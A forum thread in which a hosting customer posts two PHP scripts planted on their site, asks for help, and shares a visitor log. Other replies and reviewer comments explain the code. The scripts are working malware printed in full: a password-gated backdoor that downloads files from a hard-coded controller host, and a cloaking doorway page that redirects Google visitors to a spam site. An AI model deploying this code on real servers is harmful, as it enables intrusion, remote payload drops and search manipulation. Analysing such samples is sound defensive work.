Hacked? - Found some strange directories in my root
Hacked? - Found some strange directories in my root
I have a hosted account for my domain and recently found a directory under the /public_html/ with random letters for the directory name and a couple of scripts within including a file that is building up logging information.
Directory perms were 777 (I did not create it!)
I've included the content of the scripts below. Does anyone know what they are, where they came from, or what they are used for?
INDEX.PHP contains:
PHP Code:
<?php
// --- index.php: attacker-installed control stub for this directory (analysis notes added by reviewer) ---
// Access gate: only the MD5 of a shared secret is stored; the caller must supply the plaintext
// as ?k=... . Any other visitor gets "nk" and the script stops, so it looks inert from outside.
$k='6fb8e25b609624dc10a68641e846102a';if ($k != md5($_GET['k'])) { echo'nk'; exit; }
// Hard-coded controller host and path, plus the requested command (?c=...).
// $_GET[c] uses an unquoted bareword key — tolerated by PHP 4/5 with a notice.
$ctl="188.124.3.195";$ctlp="/ctl.php";$c=$_GET[c];
// Dispatch: init = create cache/ and register this install with the controller; check = report
// own URL and whether the directory is writable; get = download a file from the controller into
// this directory; del = wipe the directory or delete this script.
if ($c=='init'){doinit();}if ($c=='check'){docheck();}if ($c=='get'){doget();}if ($c=='del'){dodel();}
// "del" command. Paths are relative to the working directory (normally the script's own
// directory — confirm against the hosting setup). Two modes:
//   ?all=1    : unlink every entry in "." and in "cache/", remove "cache/", then print the number
//               of directory entries visited ($c is never initialised and also counts "." and "..").
//               unlink() cannot remove subdirectories, so only plain files actually go.
//   otherwise : leave an empty index.html behind and delete this script itself.
// Forensic note: an empty index.html in a directory whose script has vanished fits the second mode.
// The loose `!= false` test would also end a loop early on an entry literally named "0".
function dodel() {
if ($_GET[all]==1) {
$d="."; $dh=opendir($d);   // no error check on opendir()
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink($f);} } closedir($dh);
$d="cache"; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink("cache/$f");} } closedir($dh); rmdir("cache"); echo $c;
} else { $fd=fopen("index.html","w");fclose($fd);unlink(basename($_SERVER[PHP_SELF]));}   // self-delete
}
// "get" command: fetch one file from the controller and write it into this directory.
//   ?a=<path on the controller>  -> saved locally as basename(a). basename() blocks directory
//   traversal, but the name is chosen by the (already authenticated) caller, so any .php it
//   writes is executable on this host: this is the update/payload-drop path.
// If the local name ends in "php", every "php" in the remote path is rewritten to "txt" before
// fetching — presumably the controller stores payloads as .txt so its own web server serves
// them as text instead of executing them (inference; the controller is not visible here).
// The raw response body is written verbatim — there is no HTTP status check, so an error page
// would be saved under the requested name just the same. Prints the remote path and "'<bytes>'".
function doget() {
global $ctlp, $ctl; $a = $_GET[a];
$lname = basename($a);
$b=dirname($ctlp);   // dirname("/ctl.php") is "/"; the fetched path is "$b$a1" on $ctl
echo "$b$a";
if (eregi("php$",$lname)){$a1 = str_replace("php", "txt", $a);}   // replaces ALL "php" substrings in the path, not just the extension
else{$a1=$a;}
$fd=fopen($lname,"w");   // no error check; fwrite on a failed handle is silently lost
$d = g($ctl,80,"$b$a1");
fwrite($fd,$d); fclose($fd);
echo "'".strlen($d)."'";
}
// "init" command: create the cache/ directory (used by the companion xtyb.php for rendered
// pages), then register this install by requesting /ctl.php?c=init&me=<base64 of this
// script's own URL> from the controller. Prints "0" if mkdir fails, otherwise whatever body
// the controller returns.
function doinit() {
global$ctl,$ctlp;$b=mkdir("cache");if(!$b){echo '0';exit;}echo g($ctl,80,$ctlp."?c=init&me=".base64_encode(getme()));
}
// "check" command: print this script's URL, then ";1" if the directory is writable (probed by
// opening "tmp" for writing) or ";0". The probe file is never removed, so an empty file named
// "tmp" left in the directory is another artefact of this stub having been used.
function docheck(){
echo getme();if (fopen("tmp","w")) {echo";1";}else{echo";0";}
}
// Reconstruct this script's own URL. HTTP_HOST is taken from the client's Host header and
// PHP_SELF from the request path, so the value is whatever the caller sent, always prefixed http://.
function getme() { return "http://".$_SERVER[HTTP_HOST]."".$_SERVER[PHP_SELF]; }
// Minimal HTTP/1.0 GET over a raw socket (no curl/allow_url_fopen dependency). Returns the
// response body only; headers are read and discarded. $server doubles as the Host header.
// Caveats visible here: connect failure (60 s timeout) die()s and aborts the whole request;
// the header loop reads until a blank line appears, so a response that closes before one
// arrives (fgets() returning false) appears never to exit; $refer is computed but never used.
function g($server, $port, $file) {
$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;   // unused
fputs($socket, "GET $file HTTP/1.0\r\n");
fputs($socket, "Host: $server\r\n\r\n");
$dat = '';
do {$dat .= fgets ($socket, 1024);} while (strpos($dat,"\r\n\r\n") === false);   // skip headers
$dat = '';
while (!feof($socket)) {$dat .= fread($socket,8192);}   // body
fclose($socket);
return $dat;
}
?>
XTYB.PHP contains:
PHP Code:
<?php
// --- xtyb.php: search-engine "doorway" page generator (analysis notes added by reviewer) ---
// Flow: log the hit -> cloak (bounce people arriving from Google elsewhere, serve crawlers a
// page) -> accept only keywords listed in kw.txt -> build a page from scraped Yahoo results and
// links to sibling keyword pages -> cache it under cache/<md5> -> print it.
// Files it touches in this directory: evekwalicu.txt (log), kw.txt (keyword list), cache/.
dolog();              // every request is appended to evekwalicu.txt (see dolog) — the "logging" file the poster found
error_reporting(0);   // from here on all PHP warnings are hidden
$nr=rand(9,11);       // how many cross-links to other keyword pages to embed
list($arg,$val)=@each($_GET);   // first query parameter: its NAME is the link key ("jsya" in the posted log), its value the keyword
$t=base64_decode("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");   // page template carrying #title# #kw# #content# #relink# #rnum# placeholders (body elided in this copy)
$g = checkg($_SERVER[REMOTE_ADDR]);   // 1 if the visitor's IP is in the hard-coded (apparently Google) ranges
// Cloaking: a visitor NOT from those ranges whose Referer contains "google" — i.e. a person who
// clicked the doorway in Google results — is 302'd to a third-party redirector with the referer
// and this page's URL attached. Crawlers (and direct visits) get the keyword page built below.
if (!$g) {if(eregi("google",$_SERVER[HTTP_REFERER])){
$self=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
$goto='http://longsignups.net/in.cgi?7&ref='.urlencode($_SERVER[HTTP_REFERER])."&page=".urlencode($self);
header("Location: $goto");exit;}}
$q = str_replace("-", " ", urldecode($_GET[$arg]));   // "when-to-reformat-hard-drive" -> "when to reformat hard drive"
$c=1;
// Load the keyword list. $id is never assigned, so the `$c==$id` branch cannot fire; the loop
// only trims each line. Only keywords the attacker seeded in kw.txt are ever served.
$kws = @file('kw.txt');foreach($kws as $k) { if ($c==$id) { $q = trim($k); } $tmp[]=trim($k); } $kws = $tmp;
if (!in_array($q,$kws)){echo '404';exit;}   // unknown keyword (or missing kw.txt): bare "404" body
shuffle($kws);$rl = array_splice($kws,0,$nr);   // $nr random sibling keywords
foreach($rl as $r) { $rrl[] = "<a href=\"?$arg=".urlencode(str_replace(" ", "-", $r))."\">$r</a>"; }   // links back into this same script: the link farm
$h=md5($q); if(file_exists("cache/$h")){echo join('',file("cache/$h"));exit;}   // serve a cached render if present
$c=gets2($q);   // scraped Yahoo result snippets; returns the integer 0 (not an array) on thin results — the warnings that follow are masked
$t=str_replace("#title#",ucwords($q),$t);
$t=str_replace("#kw#",$q,$t);
$cont = array_merge($c, $rrl);
//$cont = $c;
shuffle($cont);   // scraped snippets and cross-links interleaved in random order
$t=str_replace("#content#",join(' ',$cont),$t);
$t=str_replace("#relink#",join(' ', ''),$t);   // second argument is a string, not an array — effectively blanks the placeholder
$t = preg_replace_callback("/#rnum#/",create_function('$matches','return gp();'), $t);   // each #rnum# -> a fresh 4-letter token (presumably to make every render look unique)
$f=@fopen("cache/$h","w");fwrite($f,$t);fclose($f);   // cache the render under md5(keyword)
echo $t;exit;
// Append one line per request to evekwalicu.txt: client IP, timestamp, server name, request
// URI, Referer, User-Agent, separated by " -- ". Request-supplied fields are written
// unsanitised (the `">` in the posted log excerpt came straight from a query string).
// This is the log file the thread starter found growing in the directory.
function dolog() {
$str = "$_SERVER[REMOTE_ADDR] -- ".date("Y-m-d H:i:s")." -- $_SERVER[SERVER_NAME] -- $_SERVER[REQUEST_URI] -- $_SERVER[HTTP_REFERER] -- $_SERVER[HTTP_USER_AGENT]\n"; $lp = "evekwalicu.txt"; $fd = fopen($lp, "a");fwrite($fd, $str); fclose($fd);
}
// Scrape page content for $kw from Yahoo's Web Search RSS endpoint (40 results, "adult_ok=1"
// passed through; that endpoint has since been retired, so this path is unlikely to work today).
// Returns a shuffled array of "<p><a href=link>title</a> description" fragments plus three
// "<P>" spacers, or the integer 0 when fewer than 3 <item> elements come back.
// Title/description/link are lifted from the feed with greedy `.+` patterns and go into the
// page unescaped; the first <item> (index 0) is skipped by the loop.
// On a failed connect @fsockopen returns false; with warnings suppressed, fgets(false) yields
// nothing and the header loop below appears never to exit.
function gets2($kw) {
$sc = 40;
$kw =trim($kw);
$base = "/WebSearchService/rss/webSearch.xml?appid=yahoosearchwebrss&results=$sc&query=".urlencode($kw)."&adult_ok=1";
$req = $base;
$s = @fsockopen("api.search.yahoo.com", 80, $_en, $_er, 10);   // 10 s connect timeout, errors swallowed
$rstr = "GET $req HTTP/1.0\r\n";
$rstr .= "Host: api.search.yahoo.com\r\n";
$rstr .= "\r\n";
@fwrite($s,$rstr);
$dat='';
do {$dat .= fgets ($s);} while (strpos($dat,"\r\n\r\n") === false);   // discard response headers
$dat='';
while (!feof($s)) {$dat .= fread($s,8192);}   // body
$c = $dat;
@fclose($s);
$r = preg_match_all("/<item>(.+?)<\/item>/", $c, $na);   // no /s modifier: an <item> spanning lines would not match
if ($r < 3) { return 0; }   // caller treats the result as an array; on thin results it gets 0
$ret = array();
for($i=1;$i<sizeof($na[1]);$i++) {   // starts at 1, so the first result is dropped
$tmp = $na[1][$i];
@eregi('<title>(.+)</title>', $tmp, $na2);
$title = $na2[1];
@eregi('<description>(.+)</description>', $tmp, $na2);
$description = $na2[1];
$description = str_replace("...", ".", $description);
@eregi('<link>(.+)</link>', $tmp, $na2);
$link = $na2[1];
//$ret[] = array($link, $title, $description);
//if ($i==1) {
$ret[] = "\n\n<p><a href=\"$link\">$title</a> $description";
//} else {
// $ret[] = " <br>$title $description ";
//}
}
$ret[] = "<P>";
$ret[] = "<P>";
$ret[] = "<P>";
shuffle($ret); return $ret;
}
// Is $ip inside one of four hard-coded CIDR blocks? Returns 1/0. The name and the "google"
// Referer test in the caller imply these are meant to be Google/Googlebot address ranges; it is
// a static list from the time the sample was written, so treat it as incomplete. Uses the
// deprecated split(). Note that ip_in_range()'s prefix-length branch is a bit-subset test rather
// than a true prefix match, so some unrelated addresses also pass (see that function).
function checkg($ip) {
$nfilter = split("\n", "72.14.192.0/18
74.125.0.0/16
64.233.160.0/19
66.249.64.0/19");
foreach ($nfilter as $f) {
if (ip_in_range($ip, $f)) { return 1; }
} return 0;
}
// decbin() left-padded with zeros to a fixed 32-character string; helper for ip_in_range().
Function decbin32 ($dec) { return str_pad(decbin($dec), 32, '0', STR_PAD_LEFT); }
// Generic IP-range matcher (appears to be the widely copied ip_in_range() snippet). Accepts:
//   a.b.c.d/255.255.255.0 (dotted mask), a.b.c.d/NN (prefix length; short forms padded with .0),
//   a.b.*.* (wildcard, rewritten as a start-end range), a.b.c.d-e.f.g.h (inclusive). Else false.
// Reviewer notes on the prefix-length branch — the one checkg() actually exercises:
//   * $broadcast_dec is first built via decbin32() and then immediately overwritten by the
//     `$range_dec | $wildcard_dec` form; the first computation is dead.
//   * The return test `($ip & broadcast) == $ip` only checks that every set bit of $ip is also
//     set in the broadcast address. That is a bit-subset test, not "same prefix": for
//     66.249.64.0/19 an address such as 2.1.64.1 passes. checkg() therefore over-matches.
//   * The two statements after the if/else are unreachable (every branch returns) and refer to
//     $netmask_dec, which is not assigned on that path.
Function ip_in_range($ip, $range) {
if (strpos($range, '/') !== false) {
list($range, $netmask) = explode('/', $range, 2);
if (strpos($netmask, '.') !== false) {   // dotted-mask form
$netmask = str_replace('*', '0', $netmask);
$netmask_dec = ip2long($netmask);
return ( (ip2long($ip) & $netmask_dec) == (ip2long($range) & $netmask_dec) );
} else {   // prefix-length form
$x = explode('.', $range);
while(count($x)<4) $x[] = '0';
list($a,$b,$c,$d) = $x;
$range = sprintf("%u.%u.%u.%u", empty($a)?'0':$a, empty($b)?'0':$b,empty($c)?'0':$c,empty($d)?'0':$d);
$range_dec = ip2long($range);
$ip_dec = ip2long($ip);
$broadcast_dec = bindec(substr(decbin32($range_dec), 0, $netmask)
. str_pad('', 32-$netmask, '1'));
$wildcard_dec = pow(2, (32-$netmask)) - 1;
$broadcast_dec = $range_dec | $wildcard_dec;   // overwrites the value computed just above
return (($ip_dec & $broadcast_dec) == $ip_dec);   // subset-of-bits test, see note above
}
} else {
if (strpos($range, '*') !==false) { // a.b.*.* format
$lower = str_replace('*', '0', $range);
$upper = str_replace('*', '255', $range);
$range = "$lower-$upper";
}
if (strpos($range, '-')!==false) { // A-B format
list($lower, $upper) = explode('-', $range, 2);
$lower_dec = ip2long($lower);
$upper_dec = ip2long($upper);
$ip_dec = ip2long($ip);
return ( ($ip_dec>=$lower_dec) && ($ip_dec<=$upper_dec) );
}
return false;
}
$ip_dec = ip2long($ip);   // unreachable
return (($ip_dec & $netmask_dec) == $ip_dec);   // unreachable; $netmask_dec undefined here
}
// Random token of $length (default 4) distinct characters from a 21-letter alphabet (no
// e/i/l/o/u). Fills the #rnum# placeholders in the page template. Because characters must be
// distinct, a $length above 21 would never terminate. mt_rand() is not a CSPRNG, but nothing
// here depends on unpredictability.
function gp ($length = 4)
{
$password = "";
$possible = "abcdfghjkmnpqrstvwxyz";   // 21 characters
$i = 0;
while ($i < $length) {
$char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
if (!strstr($password, $char)) {   // reject repeats
$password .= $char;
$i++;
}
}
return $password;
}
?>
Re: Hacked? - Found some strange directories in my root
Not entirely sure what the two PHP scripts are doing, but it looks like an attempt at a phishing site. (Reviewer note: neither script contains a login form or captures credentials. xtyb.php serves keyword pages assembled from scraped search results and redirects visitors who arrive from Google to a third-party URL, while index.php lets a remote operator download further files into the directory — that is search-engine spam, a "doorway", with a dropper attached, rather than phishing.)
Re: Hacked? - Found some strange directories in my root
This is what it created in EVEKWALICU.TXT
Log excerpt (plain text, not PHP):
66.160.206.167 -- 2010-03-27 13:53:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=when-to-reformat-hard-drive -- --
66.160.206.186 -- 2010-03-27 13:56:20 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance"> -- --
66.160.206.186 -- 2010-03-27 13:57:34 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance -- --
202.69.237.143 -- 2010-03-27 13:57:36 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=form-af-1540 -- -- B-Wiki/20050210
66.160.206.186 -- 2010-03-27 13:59:09 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=customer-survey-form-for-email-retail -- --
66.160.206.167 -- 2010-03-27 14:02:16 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=georgia-mortgage-form-free"> -- --
66.160.206.167 -- 2010-03-27 14:03:04 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences -- --
72.44.48.77 -- 2010-03-27 14:06:55 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences -- -- Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )
66.160.206.186 -- 2010-03-27 14:10:05 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
66.160.206.186 -- 2010-03-27 14:10:14 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
66.160.206.186 -- 2010-03-27 14:10:18 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
95.108.249.29 -- 2011-02-08 13:10:25 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-do-they-perform-an-emg -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
124.115.0.169 -- 2011-02-08 13:13:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=belly-button-information-piercing -- -- Sosospider+(+http://help.soso.com/webspider.htm)
91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=standing-order-form-letting -- -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=registration-information-ip -- http://mydomain.co.uk/kxqsyn/xtyb.php?jsya=standing-order-form-letting -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
95.108.249.29 -- 2011-02-08 13:38:02 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-to-perform-dent-repair -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
119.235.237.16 -- 2011-02-08 13:59:03 -- mydomain.co.uk -- /kxqsyn/xtyb.php?eq;rental-move-out-form&jsya -- -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
119.235.237.85 -- 2011-02-08 14:01:23 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=american-federation-immigration-reform -- -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
94.213.156.83 -- 2011-02-08 14:02:10 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=famous-violin-performers -- -- Mozilla/4.0 (compatible; ICS)
207.46.13.88 -- 2011-02-08 14:02:29 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=many-stones-can-form-an-arch -- -- Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
95.108.249.29 -- 2011-02-08 14:07:31 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=international-pulp-market-information -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
180.171.82.63 -- 2011-02-08 14:09:26 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=the-history-of-school-uniforms -- http://www.baidu.com/s?bs=%D3%A2%D3%EF%B8%A8%B5%BC%B1%A8%C9%CF%BA%A3%B0%CB%C4%EA%BC%B6%BA%AE%BC%D9%CE%C4%D5%C2&f=8&wd=the+history+of+the+school+uniforms -- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; QQDownload 661; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Only the start and end of the file are included, as there are approx. 30 hits an hour and the file is a few MB in size.
Re: Hacked? - Found some strange directories in my root
I don't know enough PHP to understand fully what it's up to, although I think it's doing some kind of search/replace — possibly injecting its own code into other PHP files in the directory? (The str_replace calls in xtyb.php fill placeholders such as #title# and #content# in its own page template; nothing in either script rewrites existing files, though index.php's "get" command can download new files from the controller into the directory.)
It also looks to be calling home, either to feed data back to its authors or to receive commands.
If I see one of my friends online who knows PHP i'll ask them about it.
Edit:
My friend replied with "Looks like the cracker is using the site for a link farm (to generate SEO). It also calls Yahoo's search API."
Interesting...